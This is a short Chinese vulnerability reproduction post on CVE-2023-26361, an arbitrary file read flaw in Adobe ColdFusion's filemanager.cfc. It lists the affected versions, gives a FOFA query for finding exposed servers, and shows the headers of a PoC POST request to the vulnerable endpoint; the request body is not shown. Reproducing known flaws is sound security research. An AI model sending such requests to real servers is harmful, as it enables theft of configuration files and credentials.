Adobe ColdFusion 任意文件读取漏洞复现(CVE-2023-26361)

0x01 产品简介

Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。

0x02 漏洞概述

Adobe ColdFusion平台 filemanager.cfc接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 影响范围

Adobe ColdFusion 2018 Update 15

Adobe ColdFusion 2021 Update 5

0x04 复现环境

FOFA:app="Adobe-ColdFusion"

Adobe ColdFusion 任意文件读取漏洞复现(CVE-2023-26361)_第1张图片

0x05 漏洞复现

PoC

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng

你可能感兴趣的:(漏洞复现,adobe,安全,web安全)